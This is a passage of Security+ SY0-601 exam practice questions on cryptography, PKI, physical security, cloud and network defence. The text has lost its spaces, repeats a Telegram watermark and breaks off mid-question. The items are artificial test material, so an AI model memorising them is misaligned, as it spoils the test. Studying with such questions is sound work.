136. Maria'sorganizationusesaCCTVmonitoringsystemintheirmainofficebuilding,whichisoccupiedandinuse24-7.Thesystemusescamerasconnectedtodisplaystoprovidereal-timemonitoring.WhatadditionalfeatureisthemostlikelytoreceiverequeststoensurethatherorganizationcaneffectivelyusetheCCTVsystemtorespondtotheftandotherissues?
A. Motionactivation
B. Infraredcameras
C. DVR
D. Facialrecognition
137. Whatistheprimarythreatmodelagainststaticcodesusedformultifactorauthentication?
A. Bruteforce
B. Collisions
C. Theft
D. Clockmismatch
138. Dennisneedsacryptographicalgorithmthatprovideslowlatency.Whattypeofcryptosystemismostlikelytomeetthisperformancerequirement?
A. Hashing
B. Symmetricencryption
C. Asymmetricencryption
D. Electronicone-timepad
139. ThecompanythatDevinworksforhasselectedanondescriptbuildinganddoesnotuseexteriorsignagetoadvertisethatthefacilitybelongstothem.
Telegram Channel @nettrain
Whatphysicalsecuritytermdescribesthistypeofsecuritycontrol?
A. Industrialcamouflage
B. Demilitarizedzone
C. Industrialobfuscation
D. Disruptivecoloration
140. EdknowsthatTLSsessionsstartusingasymmetricencryption,andthenmovetousesymmetrickeys.Whatlimitationofasymmetriccryptographydrivesthisdesigndecision?
A. Speedandcomputationaloverhead
B. Keylengthlimitations
C. Lifespan(time)tobruteforceit
D. Keyreuseforasymmetricalgorithms
141. Whenyouareconcernedaboutapplicationsecurity,whatisthemostimportantissueinmemorymanagement?
A. Neverallocateavariableanylargerthanisneeded.
B. Alwayscheckboundsonarrays.
C. Alwaysdeclareavariablewhereyouneedit(i.e.,atfunctionorfilelevelifpossible).
D. Makesureyoureleaseanymemoryyouallocate.
142. Bartwantstoensurethatthefilesheencryptsremainsecureforaslongaspossible.WhatshouldBartdotomaximizethelongevityofhisencryptedfile'ssecurity?
A. Useaquantumcipher.
B. Usethelongestkeypossible.
C. Useananti-quantumcipher.
D. Usearotatingsymmetrickey.
143. Nadine'sorganizationstoresandusessensitiveinformation,includingSocialSecuritynumbers.Afterarecentcompromise,shehasbeenaskedtoimplementtechnologythatcanhelppreventthissensitivedatafromleavingthecompany'ssystemsandnetworks.Whattypeoftechnologyshould
Telegram Channel @nettrain
Nadineimplement?
A. Statefulfirewalls
B. OEM
C. DLP
D. SIEM
144. Whatformisthedatausedforquantumkeydistributionsentin?
A. Bytes
B. Bits
C. Qubits
D. Nuquants
145. Alicianeedstoensurethataprocesscannotbesubvertedbyasingleemployee.Whatsecuritycontrolcansheimplementtopreventthis?
A. Biometricauthentication
B. Two-personcontrol
C. Roboticsentries
D. ADMZ
146. Sociallogin,theabilitytouseanexistingidentityfromasitelikeGoogle,Facebook,oraMicrosoftaccount,isanexampleofwhichofthefollowingconcepts?
A. Federation
B. AAA
C. Privilegecreep
D. Identityandaccessmanagement
147. Michelleistravelingandwantstoplugherphoneintothechargerinherhotelroom.Whatsecurityprecautioncansheusetoensurethatherphoneisnotattackedbyamaliciousdevicebuiltintothechargerinherroom?
A. AUSBdatablocker
B. AparallelUSBcable
C. Adatacircuitbreaker
Telegram Channel @nettrain
D. AnHOTPinterrogator
148. Whichcloudservicemodelprovidestheconsumerwiththeinfrastructuretocreateapplicationsandhostthem?
A. SaaS
B. PaaS
C. IaaS
D. IDaaS
149. Whyisavoidinginitializationvectorandkeyreuserecommendedtoensuresecureencryption?
A. Itmakesitimpossibletobruteforce.
B. Itmeansasinglesuccessfulattackwillnotexposemultiplemessages.
C. Itmeansasinglesuccessfulattackwillnotexposeanymessages.
D. Itmakesbruteforceeasier.
150. DanknowsthathisLinuxsystemgeneratesentropythatisusedformultiplefunctions,includingencryption.WhichofthefollowingisasourceofentropyfortheLinuxkernel?
A. Timeofday
B. Userloginevents
C. Keystrokesandmousemovement
D. Networkpackettiming
151. Mikeknowsthatcomputationaloverheadsareaconcernforcryptographicsystems.Whatcanhedotohelplimitthecomputationalneedsofhissolution?
A. Usehashesinstead.
B. Useshortkeys.
C. Useellipticcurveencryption.
D. UsetheRSAalgorithm.
152. Whatistheprimaryroleoflightinginaphysicalsecurityenvironment?
A. Itactsasadetectivecontrol.
Telegram Channel @nettrain
B. Itactsasareactivecontrol.
C. Itactsasadeterrentcontrol.
D. Itactsasacompensatingcontrol.
153. Dennishasdeployedserversandstoragetoeachofthefacilitieshisorganizationrunstoensurethatscientificequipmentcansendandreceivedataatthespeedthatitneedstofunction.Whatcomputationaldesignconceptdescribesthis?
A. Hybridcloud
B. Mistcomputing
C. Edgecomputing
D. Localcloud
154. Benreplacessensitivedatainhisdatabasewithuniqueidentifiers.Theidentifiersallowhimtocontinuetotakeactionsonthedatawithoutexposingthedataitself.Whattypeofsolutionhashedeployed?
A. Masking
B. Encryption
C. Hashing
D. Tokenization
155. Danawantstodiscouragepotentialmaliciousactorsfromaccessingherfacility.Whichofthefollowingisbothadeterrentandaphysicalcontrol?
A. Avisitorlog
B. Amotiondetector
C. Asecuritycamera
D. Fences
156. Whatadditionalcapabilitiesdoesaddingadigitalsignaturetoanencryptedmessageprovide?
A. Integrityandnonrepudiation
B. Confidentialityandintegrity
C. Availabilityandnonrepudiation
Telegram Channel @nettrain
D. Confidentialityandavailability
157. Meganhasbeenaskedtosetupaperiodicattestationprocessforaccountsinherorganization.Whathasshebeenaskedtodo?
A. Validatethattheusersarestillemployed.
B. Validatethattheuser'srightsandpermissionsarestillcorrect.
C. Requireuserstoprovideproofofidentity.
D. Validatesecuritycontrolsaspartofatest.
158. Elainewantstoadoptappropriateresponseandrecoverycontrolsfornaturaldisasters.Whattypeofcontrolshouldsheusetoprepareforamultihourpoweroutagecausedbyatornado?
A. Ahotsite
B. Agenerator
C. APDU
D. AUPS
159. Whatdoesamessageauthenticationcode(MAC)dowhenusedaspartofacryptographicsystem?
A. Itvalidatesthemessage'sintegrityandauthenticity.
B. Itvalidatesthemessage'sconfidentialityandauthenticity.
C. Itprotectsthemessage'sconfidentialityandintegrity.
D. Noneoftheabove
160. Charleswantstoputafiresuppressionsysteminplaceinanareawherehighlysensitiveelectronicsareinuse.WhattypeoffiresuppressionsystemisbestsuitedtothistypeofenvironmentifCharlesisconcernedaboutpotentialharmtofirstrespondersoron-sitestaff?
A. Pre-charge
B. Drypipe
C. Inertgas
D. Carbondioxide
161. Whattechnologyistypicallyusedforproximitycardreaders?
Telegram Channel @nettrain
A. Magneticstripe
B. Biometrics
C. RFID
D. Infrared
162. Howdoesasymmetricencryptionsupportnonrepudiation?
A. Usingdigitalsignatures
B. Usinglongerkeys
C. Usingreversiblehashes
D. Usingtherecipient'spublickey
163. Oliviaknowsthatsheneedstoconsidergeographyaspartofhersecurityconsiderations.Whichofthefollowingisaprimarydriverofgeographicalconsiderationsforsecurity?
A. MTR
B. Naturaldisasters
C. Serviceintegration
D. Sprawlavoidance
164. ScottwantstolimittheimpactofpotentialthreatsfromUAVs.Whatphysicalsecuritycontrolisbestsuitedtothispurpose?
A. Addingmorefences
B. Movingsensitiveareastotheinteriorofabuilding
C. Deployingbiometricsensors
D. MovingsensitiveareastoFaradaycages
165. Derekwantstoexplaintheconceptofresourceconstraintsdrivingsecurityconstraintswhenusingencryption.Whichofthefollowingdescriptionsbestexplainsthetrade-offsthatheshouldexplaintohismanagement?
A. Strongerencryptionrequiresmorespaceondrives,meaningthattheharderitistobreak,themorestorageyou'llneed,drivingupcost.
B. Strongerencryptionisfaster,whichmeansthatusingstrongencryptionwillresultinlowerlatency.
Telegram Channel @nettrain
C. Strongerencryptionrequiresmoreentropy.Thismayreducetheoverallsecurityofthesystemwhenentropyisexhausted.
D. Strongerencryptionrequiresmorecomputationalresources,requiringabalancebetweenspeedandsecurity.
166. Amandawantstoensurethatthemessagesheissendingremainsconfidential.Whatshouldshedotoensurethis?
A. Hashthemessages.
B. Digitallysignthemessage.
C. Encryptthemessage.
D. Useaquantumencryptionalgorithm.
167. WhatsecurityadvantagedocloudserviceproviderslikeAmazon,Google,andMicrosofthaveoverlocalstaffandsystemsformostsmalltomid-sizedorganizations?
A. Betterunderstandingoftheorganization'sbusinesspractices
B. Fasterresponsetimes
C. Moresecuritystaffandbudget
D. Noneoftheabove
168. Timwantstoensurethathiswebserverscanscalehorizontallyduringtrafficincreases,whilealsoallowingthemtobepatchedorupgradedwithoutcausingoutages.Whattypeofnetworkdeviceshouldhedeploy?
A. Afirewall
B. Aswitch
C. Ahorizontalscaler
D. Anetworkloadbalancer
169. Gabbywantstoensurethatsensitivedatacanbetransmittedinunencryptedformbyusingphysicalsafeguards.Whattypeofsolutionshouldsheimplement?
A. Shieldedcables
B. Armoredcables
C. Distributionlockdown
Telegram Channel @nettrain
D. Protectedcabledistribution
170. MaureenconcealsinformationshewantstotransmitsurreptitiouslybymodifyinganMP3fileinawaythatdoesnotnoticeablychangehowitsounds.Whatisthistechniquecalled?
A. MP3crypt
B. Audiosteganography
C. Audiohashing
D. HoneyMP3s
171. Nicoleisassessingriskstohermultifactorauthenticationsystem.Whichofthefollowingisthemostlikelythreatmodelagainstshortmessageservice(SMS)pushnotificationstocellphonesforherenvironment?
A. AttacksonVoIPsystems
B. SIMcloning
C. Brute-forceattacks
D. Rainbowtables
172. Johnwantstoprotectdataatrestsothathecanprocessitanduseitasneededinitsoriginalform.Whatsolutionfromthefollowinglistisbestsuitedtothisrequirement?
A. Hashing
B. TLS
C. Encryption
D. Tokenization
173. Nathanielhasdeployedthecontrolinfrastructureforhismanufacturingplantwithoutanetworkconnectiontohisothernetworks.Whattermdescribesthistypeofconfiguration?
A. DMZ
B. Airgap
C. Vaulting
D. Ahotaisle
174. NaomihidestheoriginaldatainaSocialSecuritynumberfieldtoensure
Telegram Channel @nettrain
thatitisnotexposedtousersofherdatabase.Whatdatasecuritytechniquedoesthisdescribe?
A. Masking
B. Encryption
C. Hashing
D. Tokenization
175. Isaacwantstouseon-premisescloudcomputing.Whattermdescribesthistypeofcloudcomputingsolution?
A. Infrastructureasaservice
B. Hybridcloud
C. Privatecloud
D. Platformasaservice
176. Whatistheprimarythreatmodelagainstphysicaltokensusedformultifactorauthentication?
A. Cloning
B. Bruteforce
C. Theft
D. Algorithmfailure
177. Mariaisasecurityadministratorforalargebank.Sheisconcernedaboutmalware,particularlyspywarethatcouldcompromisecustomerdata.Whichofthefollowingwouldbethebestapproachforhertomitigatethethreatofspyware?
A. Computerusagepolicies,networkantimalware,andhostantimalware
B. Hostantimalwareandnetworkantimalware
C. Hostandnetworkantimalware,computerusagepolicies,andwebsitewhitelisting
D. Hostandnetworkantimalware,computerusagepolicies,andemployeetraining
178. CharleshasconfiguredhismultifactorsystemtorequirebothaPINandapassword.Howmanyeffectivefactorsdoeshehaveinplaceoncehe
Telegram Channel @nettrain
presentsbothoftheseandhisusername?
A. One
B. Two
C. Three
D. Four
179. Fredaddsthevalue89EA443CCDA16B89toeverypasswordasasalt.Whatissuemightthiscause?
A. Thesaltistoolong.
B. Thesaltisalphanumeric.
C. Thesaltisreused.
D. Thesaltistooshort.
180. Alainaneedstophysicallysecuretherootencryptionkeysforacertificateauthority.Whattypeofsecuritydeviceshouldsheusetomaintainlocalcontrolandsecurityforthem?
A. AUSBthumbdrive
B. Avaultorsafe
C. Anair-gappedsystem
D. Noneoftheabove
181. AngelawantstohelpherorganizationuseAPIsmoresecurelyandneedstoselectthreeAPIsecuritybestpractices.WhichofthefollowingoptionsisnotacommonAPIsecuritybestpractice?
A. UseencryptionthroughouttheAPI'srequest/responsecycle.
B. Authorizebeforeauthenticating.
C. Donottrustinputstringsandvalidateparameters.
D. Enableauditingandlogging.
182. Frankusesapowerfulmagnettowipetapesbeforetheyareremovedfromhisorganization'sinventory.Whattypeofsecuredatadestructiontechniquehasheused?
A. Tapeburning
Telegram Channel @nettrain
B. Datashredding
C. Degaussing
D. Pulping
183. Angelahasbeenaskedtodeploy5Gcellularinsideherorganization.Whatconcernshouldsheraisewithhermanagementabouttheefforttoimplementit?
A. 5Grequireshighlevelsofantennadensityforfullcoverage.
B. 5Gsignalsshouldonlybeusedinexteriordeployments.
C. 5Gisnotwidelyavailableandcannotbedeployedyet.
D. 5GsignalscannotcoexistwithtraditionalWi-Fi.
184. Chrisisreviewingtherightsthatstaffinhisorganizationhavetodatastoredinagroupofdepartmentalfileshares.Heisconcernedthatrightsmanagementpracticeshavenotbeenfollowedandthatemployeeswhohavebeenwiththecompanyheworksforhavenothadtheirprivilegesremovedaftertheyswitchedjobs.WhattypeofissuehasChrisencountered?
A. Privilegecreep
B. IAMinflation
C. Maskingissues
D. Privilegeescalation
185. Isaachasbeenaskedtosetupahoneyfile.Whatshouldheconfigure?
A. Alistoftaskstoaccomplish
B. Alistofpotentiallyvaluabledata
C. Abaitfileforattackerstoaccess
D. AvulnerableWordfile
186. Yasminewantstoensurethatshehasmetageographicdispersalrequirementforherdatacenters.Howfarawayshouldsheplaceherdatacenterbasedoncommonbestpracticesfordispersal?
A. 5miles
B. 45miles
Telegram Channel @nettrain
C. 90miles
D. 150miles
187. Whattermdescribesextendingcloudcomputingtotheedgeofanenterprisenetwork?
A. Localcloud
B. Fogcomputing
C. Managedcloud
D. Bladecomputing
188. Whichofthefollowingalgorithmsisakeystretchingalgorithm?
A. bcrypt
B. ncrypt
C. MD5
D. SHA1
189. Jocelynhasbeenaskedtoimplementadirectoryservice.Whichofthefollowingtechnologiesshouldshedeploy?
A. SAML
B. OAuth
C. LDAP
D. 802.1x
Telegram Channel @nettrain
Chapter3Implementation
THECOMPTIASECURITY+EXAMSY0-601TOPICSCOVEREDINTHISCHAPTERINCLUDETHEFOLLOWING:
3.1 Givenascenario,implementsecureprotocols
3.2 Givenascenario,implementhostorapplicationsecuritysolutions
3.3 Givenascenario,implementsecurenetworkdesigns
3.4 Givenascenario,installandconfigurewirelesssecuritysettings
3.5 Givenascenario,implementsecuremobilesolutions
3.6 Givenascenarioapplycybersecuritysolutionstothecloud
3.7 Givenascenario,implementidentityandaccountmanagementcontrols
3.8 Givenascenario,implementauthenticationandauthorizationsolutions
3.9 Givenascenario,implementpublickeyinfrastructure
1. Adamissettingupapublickeyinfrastructure(PKI)andknowsthatkeepingthepassphrasesandencryptionkeysusedtogeneratenewkeysisacriticalpartofhowtoensurethattherootcertificateauthorityremainssecure.Whichofthefollowingtechniquesisnotacommonsolutiontohelppreventinsiderthreats?
A. Requireanewpassphraseeverytimethecertificateisused.
B. Useasplitknowledgeprocessforthepasswordorkey.
C. Requiredualcontrol.
D. Implementseparationofduties.
2. Naomiisdesigningherorganization'swirelessnetworkandwantstoensure
Telegram Channel @nettrain
thatthedesignplacesaccesspointsinareaswheretheywillprovideoptimumcoverage.ShealsowantstoplanforanysourcesofRFinterferenceaspartofherdesign.WhatshouldNaomidofirst?
A. ContacttheFCCforawirelessmap.
B. Conductasitesurvey.
C. Disableallexistingaccesspoints.
D. Conductaportscantofindallexistingaccesspoints.
3. Chrisispreparingtoimplementan802.1X-enabledwirelessinfrastructure.HeknowsthathewantstouseanExtensibleAuthenticationProtocol(EAP)-basedprotocolthatdoesnotrequireclient-sidecertificates.Whichofthefollowingoptionsshouldhechoose?
A. EAP-MD5
B. PEAP
C. LEAP
D. EAP-TLS
4. Whattermiscommonlyusedtodescribelateraltrafficmovementwithinanetwork?
A. Side-stepping
B. Slidertraffic
C. East-westtraffic
D. Peerinterconnect
5. CharlenewantstousethesecurityfeaturesbuiltintoHTTPheaders.WhichofthefollowingisnotanHTTPheadersecurityoption?
A. Requiringtransportsecurity
B. Preventingcross-sitescripting
C. DisablingSQLinjection
D. HelpingpreventMIMEsniffing
6. Charlenewantstoprovisionherorganization'sstandardsetofmarketinginformationtomobiledevicesthroughoutherorganization.WhatMDMfeatureisbestsuitedtothistask?
Telegram Channel @nettrain
A. Applicationmanagement
B. Remotewipe
C. Contentmanagement
D. Pushnotifications
7. Dennywantstodeployantivirusforhisorganizationandwantstoensurethatitwillstopthemostmalware.WhatdeploymentmodelshouldDennyselect?
A. InstallantivirusfromthesamevendoronindividualPCsandserverstobestbalancevisibility,support,andsecurity.
B. InstallantivirusfrommorethanonevendoronallPCsandserverstomaximizecoverage.
C. InstallantivirusfromonevendoronPCsandfromanothervendorontheservertoprovideagreaterchanceofcatchingmalware.
D. Installantivirusonlyonworkstationstoavoidpotentialissueswithserverperformance.
8. WhenAmandavisitsherlocalcoffeeshop,shecanconnecttotheopenwirelesswithoutprovidingapasswordorloggingin,butsheisimmediatelyredirectedtoawebsitethatasksforheremailaddress.Oncesheprovidesit,sheisabletobrowsetheInternetnormally.WhattypeoftechnologyhasAmandaencountered?
A. Apresharedkey
B. Acaptiveportal
C. Portsecurity
D. AWi-Fiprotectedaccess
9. CharleshasbeenaskedtoimplementDNSSECforhisorganization.Whichofthefollowingdoesitprovide?
A. Confidentiality
B. Integrity
C. Availability
D. Alloftheabove
Telegram Channel @nettrain
10. SarahhasimplementedanOpenID-basedauthenticationsystemthatreliesonexistingGoogleaccounts.WhatroledoesGoogleplayinafederatedenvironmentlikethis?
A. AnRP
B. AnIdP
C. AnSP
D. AnRA
11. Ianneedstoconnecttoasystemviaanencryptedchannelsothathecanuseacommand-lineshell.Whatprotocolshouldheuse?
A. Telnet
B. HTTPS
C. SSH
D. TLS
12. Caseyisconsideringimplementingpasswordkeydevicesforherorganization.Shewantstouseabroadlyadoptedopenstandardforauthenticationandneedsherkeystosupportthat.Whichofthefollowingstandardsshouldshelookforherkeystoimplement,inadditiontobeingabletoconnectviaUSB,Bluetooth,andNFC?
A. SAML
B. FIDO
C. ARF
D. OpenID
13. NadiaisconcernedaboutthecontentofheremailstoherfriendDaniellebeingreadastheymovebetweenservers.Whattechnologycansheusetoencryptheremails,andwhosekeyshouldsheusetoencryptthemessage?
A. S/MIME,herprivatekey
B. SecurePOP3,herpublickey
C. S/MIME,Danielle'spublickey
D. SecurePOP3,Danielle'sprivatekey
14. WhattypeofcommunicationsisSRTPmostlikelytobeusedfor?
Telegram Channel @nettrain
A. Email
B. VoIP
C. Web
D. Filetransfer
15. Oliviaisimplementingaload-balancedwebapplicationcluster.Herorganizationalreadyhasaredundantpairofloadbalancers,buteachunitisnotratedtohandlethemaximumdesignedthroughputoftheclusterbyitself.Oliviahasrecommendedthattheloadbalancersbeimplementedinanactive/activedesign.Whatconcernshouldsheraiseaspartofthisrecommendation?
A. Theloadbalancerclustercannotbepatchedwithoutaserviceoutage.
B. Theloadbalancerclusterisvulnerabletoadenial-of-serviceattack.
C. Ifoneoftheloadbalancersfails,itcouldleadtoservicedegradation.
D. Noneoftheabove
16. WhattwoportsaremostcommonlyusedforFTPStraffic?
A. 21,990
B. 21,22
C. 433,1433
D. 20,21
17. Whatoccurswhenacertificateisstapled?
A. BoththecertificateandOCSPresponderaresenttogethertopreventadditionalretrievalsduringcertificatepathvalidation.
B. Thecertificateisstoredinasecuredlocationthatpreventsthecertificatefrombeingeasilyremovedormodified.
C. Boththehostcertificateandtherootcertificateauthority'sprivatekeyareattachedtovalidatetheauthenticityofthechain.
D. Thecertificateisattachedtoothercertificatestodemonstratetheentirecertificatechain.
18. Gregissettingupapublickeyinfrastructure(PKI).Hecreatesanofflinerootcertificateauthority(CA)andthenneedstoissuecertificatestousers
Telegram Channel @nettrain
anddevices.WhatsystemordeviceinaPKIreceivescertificatesigningrequests(CSRs)fromapplications,systems,andusers?
A. AnintermediaCA
B. AnRA
C. ACRL
D. Noneoftheabove
19. Markisresponsibleformanaginghiscompany'sloadbalancerandwantstouseaload-balancingschedulingtechniquethatwilltakeintoaccountthecurrentserverloadandactivesessions.Whichofthefollowingtechniquesshouldhechoose?
A. SourceIPhashing
B. Weightedresponsetime
C. Leastconnection
D. Roundrobin
20. Duringasecurityreview,MattnoticesthatthevendorheisworkingwithliststheirIPSecvirtualprivatenetwork(VPN)asusingAHprotocolforsecurityofthepacketsthatitsends.WhatconcernshouldMattnotetohisteamaboutthis?
A. AHdoesnotprovideconfidentiality.
B. AHdoesnotprovidedataintegrity.
C. AHdoesnotprovidereplayprotection.
D. Noneoftheabove;AHprovidesconfidentiality,authentication,andreplayprotection.
21. MichellewantstosecuremailbeingretrievedviathePostOfficeProtocolVersion3(POP3)becausesheknowsthatitisunencryptedbydefault.WhatisherbestoptiontodothiswhileleavingPOP3runningonitsdefaultport?
A. UseTLSviaport25.
B. UseIKEviaport25.
C. UseTLSviaport110.
Telegram Channel @nettrain
D. UseIKEviaport110.
22. Danielworksforamid-sizedfinancialinstitution.Thecompanyhasrecentlymovedsomeofitsdatatoacloudsolution.Danielisconcernedthatthecloudprovidermaynotsupportthesamesecuritypoliciesasthecompany'sinternalnetwork.Whatisthebestwaytomitigatethisconcern?
A. Implementacloudaccesssecuritybroker.
B. Performintegrationtesting.
C. Establishcloudsecuritypolicies.
D. Implementsecurityasaservice.
23. ThecompanythatAngelaworksforhasdeployedaVoiceoverIP(VoIP)environmentthatusesSIP.Whatthreatisthemostlikelyissuefortheirphonecalls?
A. Callinterception
B. Vishing
C. Wardialing
D. Denial-of-serviceattacks
24. AlainaisconcernedaboutthesecurityofherNTPtimesynchronizationservicebecausesheknowsthatprotocolslikeTLSandBGParesusceptibletoproblemsiffakeNTPmessageswereabletocausetimemismatchesbetweensystems.WhattoolcouldsheusetoquicklyprotectherNTPtrafficbetweenLinuxsystems?
A. AnIPSecVPN
B. SSHtunneling
C. RDP
D. ATLSVPN
25. RamonisbuildinganewwebserviceandisconsideringwhichpartsoftheserviceshoulduseTransportLayerSecurity(TLS).Componentsoftheapplicationinclude:
1. Authentication
2. Apaymentform
Telegram Channel @nettrain
3. Userdata,includingaddressandshoppingcart
4. Ausercommentsandreviewssection
WhereshouldheimplementTLS?
A. Atpoints1and2,and4
B. Atpoints2and3,and4
C. Atpoints1,2,and3
D. Atallpointsintheinfrastructure
26. Katie'sorganizationusesFileTransferProtocol(FTP)forcontractorstosubmittheirworkproducttoherorganization.Thecontractorsworkonsensitivecustomerinformation,andthenuseorganizationalcredentialsprovidedbyKatie'scompanytologinandtransfertheinformation.Whatsensitiveinformationcouldattackersgatheriftheywereabletocapturethenetworktrafficinvolvedinthistransfer?
A. Nothing,becauseFTPisasecureprotocol
B. IPaddressesforbothclientandserver
C. Thecontentofthefilesthatwereuploaded
D. Usernames,passwords,andfilecontent
27. WhatsecuritybenefitsareprovidedbyenablingDHCPsnoopingorDHCPsniffingonswitchesinyournetwork?
A. PreventionofmaliciousormalformedDHCPtraffic
B. PreventionofrogueDHCPservers
C. CollectionofinformationaboutDHCPbindings
D. Alloftheabove
28. Aaronwantstouseacertificateforthefollowingproductionhosts:
www.example.com
blog.example.com
news.example.com
WhatisthemostefficientwayforhimtoprovideTransportLayerSecurity(TLS)forallofthesesystems?
A. Useself-signedcertificates.
Telegram Channel @nettrain
B. Useawildcardcertificate.
C. UseanEVcertificate.
D. UseanSSLcertificate.
29. Cassandraisconcernedaboutattacksagainsthernetwork'sSpanningTreeProtocol(STP).ShewantstoensurethatanewswitchintroducedbyanattackercannotchangethetopologybyassertingalowerbridgeIDthanthecurrentconfiguration.Whatshouldsheimplementtopreventthis?
A. EnableBridgeProtect.
B. SetthebridgeIDtoanegativenumber.
C. DisableSpanningTreeprotocol.
D. EnableRootGuard.
30. CharlesfindsaPFXformattedfileonthesystemheisreviewing.WhatisaPFXfilecapableofcontaining?
A. Onlycertificatesandchaincertificates,notprivatekeys
B. Onlyaprivatekey
C. Aservercertificate,intermediatecertificates,andtheprivatekey
D. Noneoftheabove,becausePFXfilesareusedforcertificaterequestsonly
31. Whichdevicewouldmostlikelyprocessthefollowingrules?
PERMITIPANYEQ443
DENYIPANYANY
A. NIPS
B. HIPS
C. Contentfilter
D. Firewall
32. TedwantstouseIPreputationinformationtoprotecthisnetworkandknowsthatthirdpartiesprovidethatinformation.Howcanhegetthisdata,andwhatsecureprotocolishemostlikelytousetoretrieveit?
A. Asubscriptionservice,SAML
Telegram Channel @nettrain
B. AVDI,XML
C. Asubscriptionservice,HTTPS
D. AnFDE,XML
33. WhatdoessettingthesecureattributeforanHTTPcookieresultin?
A. Cookieswillbestoredinencryptedform.
B. CookieswillbesentonlyoverHTTPS.
C. Cookieswillbestoredinhashedform.
D. Cookiesmustbeaccessedusingacookiekey.
34. CharleswantstouseIPSecandneedstobeabletodeterminetheIPSecpolicyfortrafficbasedontheportitisbeingsenttoontheremotesystem.WhichIPSecmodeshouldheuse?
A. IPSectunnelmode
B. IPSecIKEmode
C. IPSecPSKmode
D. IPSectransportmode
35. Wi-FiProtectedSetup(WPS)includesfourmodesforaddingdevicestoanetwork.Whichmodehassignificantsecurityconcernsduetoabrute-forceexploit?
A. PIN
B. USB
C. Pushbutton
D. Near-fieldcommunication
36. Clairewantstocheckwhetheracertificatehasbeenrevoked.Whatprotocolisusedtovalidatecertificates?
A. RTCP
B. CRBL
C. OCSP
D. PKCRL
37. Nickisresponsibleforcryptographickeysinhiscompany.Whatisthebest
Telegram Channel @nettrain
waytodeauthorizeapublickey?
A. Sendoutanetworkalert.
B. Deletethedigitalcertificate.
C. PublishthatcertificateintheCRL.
D. NotifytheRA.
38. Whattwoconnectionmethodsareusedformostgeofencingapplications?
A. CellularandGPS
B. USBandBluetooth
C. GPSandWi-Fi
D. CellularandBluetooth
39. Gabrielissettingupanewe-commerceserver.Heisconcernedaboutsecurityissues.Whichofthefollowingwouldbethebestlocationtoplaceane-commerceserver?
A. DMZ
B. Intranet
C. Guestnetwork
D. Extranet
40. Janelleisthesecurityadministratorforasmallcompany.Sheistryingtoimprovesecuritythroughoutthenetwork.Whichofthefollowingstepsshouldshetakefirst?
A. Implementantimalwareonallcomputers.
B. Implementacceptableusepolicies.
C. Turnoffunneededservicesonallcomputers.
D. Setpasswordreusepolicies.
41. Benisresponsibleforanewapplicationwithaworldwideuserbasethatwillallowuserstosignuptoaccessexistingdataaboutthem.Hewouldliketouseamethodofauthenticationthatwillpermithimtoverifythatusersarethecorrectpeopletomatchupwiththeiraccounts.Howcanhevalidatetheseusers?
A. RequirethattheypresenttheirSocialSecuritynumber.
Telegram Channel @nettrain
B. RequirethemtouseafederatedidentityviaGoogle.
C. Requirethemtouseknowledge-basedauthentication.
D. Requirethemtovalidateanemailsenttotheaccounttheysignedupwith.
42. Jasonwantstoimplementaremoteaccessvirtualprivatenetwork(VPN)forusersinhisorganizationwhoprimarilyrelyonhostedwebapplications.WhatcommonVPNtypeisbestsuitedtothisifhewantstoavoiddeployingclientsoftwaretohisend-usersystems?
A. ATLSVPN
B. AnRDP(RemoteDesktopProtocol)VPN
C. AnInternetControlMessageProtocol(ICMP)VPN
D. AnIPSecVPN
43. Juanisanetworkadministratorforaninsurancecompany.Hiscompanyhasanumberoftravelingsalespeople.Heisconcernedaboutconfidentialdataontheirlaptops.Whatisthebestwayforhimtoaddressthis?
A. FDE
B. TPM
C. SDN
D. DMZ
44. WhichdesignconceptlimitsaccesstosystemsfromoutsideuserswhileprotectingusersandsystemsinsidetheLAN?
A. DMZ
B. VLAN
C. Router
D. Guestnetwork
45. Ninawantstouseinformationaboutherusersliketheirbirthdates,addresses,andjobtitlesaspartofheridentitymanagementsystem.Whattermisusedtodescribethistypeofinformation?
A. Roles
B. Factors
Telegram Channel @nettrain
C. Identifiers
D. Attributes
46. Meganispreparingacertificatesigningrequest(CSR)andknowsthatsheneedstoprovideaCNforherwebserver.WhatinformationwillsheputintotheCNfieldfortheCSR?
A. Hername
B. Thehostname
C. Thecompany'sname
D. Thefullyqualifieddomainnameofthesystem
47. WhichofthefollowingistheequivalentofaVLANfromaphysicalsecurityperspective?
A. Perimetersecurity
B. Partitioning
C. Securityzones
D. Firewall
48. Nelsonusesatoolthatliststhespecificapplicationsthatcanbeinstalledandrunonasystem.Thetooluseshashesoftheapplication'sbinarytoidentifyeachapplicationtoensurethattheapplicationmatchesthefilenameprovidedforit.WhattypeoftoolisNelsonusing?
A. Antivirus
B. Blacklisting
C. Antimalware
D. Whitelisting
49. Whichtypeoffirewallexaminesthecontentandcontextofeachpacketitencounters?
A. Packetfilteringfirewall
B. Statefulpacketfilteringfirewall
C. Applicationlayerfirewall
D. Gatewayfirewall
Telegram Channel @nettrain
50. Aspartofhiswirelessnetworkdeploymentefforts,Scottgeneratestheimageshownhere.Whattermisusedtodescribethistypeofvisualizationofwirelessnetworks?
A. Aheatmap
B. Anetworkdiagram
C. Azonemap
D. ADMZ
51. You'redesigninganewnetworkinfrastructuresothatyourcompanycanallowunauthenticatedusersconnectingfromtheInternettoaccesscertainareas.Yourgoalistoprotecttheinternalnetworkwhileprovidingaccesstothoseareas.Youdecidetoputthewebserveronaseparatesubnetopentopubliccontact.Whatisthissubnetcalled?
A. Guestnetwork
Telegram Channel @nettrain
B. DMZ
C. Intranet
D. VLAN
52. Madhuri'swebapplicationconvertsnumbersthatareinputintofieldsbyspecificallytypingthemandthenappliesstrictexceptionhandling.Italsosetsaminimumandmaximumlengthfortheinputsthatitallowsandusespredefinedarraysofallowedvaluesforinputslikemonthsordates.WhattermdescribestheactionsthatMadhuri'sapplicationisperforming?
A. Bufferoverflowprevention
B. Stringinjection
C. Inputvalidation
D. Schemavalidation
53. You'reoutliningyourplansforimplementingawirelessnetworktouppermanagement.Whatwirelesssecuritystandardshouldyouadoptifyoudon'twanttouseenterpriseauthenticationbutwanttoprovidesecureauthenticationforusersthatdoesn'trequireasharedpasswordorpassphrase?
A. WPA3
B. WPA
C. WPA2
D. WEP
54. Brandonwantstoensurethathisintrusionpreventionsystem(IPS)isabletostopattacktraffic.Whichdeploymentmethodismostappropriateforthisrequirement?
A. Inline,deployedasanIPS
B. Passiveviaatap,deployedasanIDS
C. Inline,deployedasanIDS
D. Passiveviaatap,deployedasanIPS
55. Youarethechiefsecurityofficer(CSO)foralargecompany.Youhavediscoveredmalwareononeoftheworkstations.Youareconcernedthatthemalwaremighthavemultiplefunctionsandmighthavecausedmore
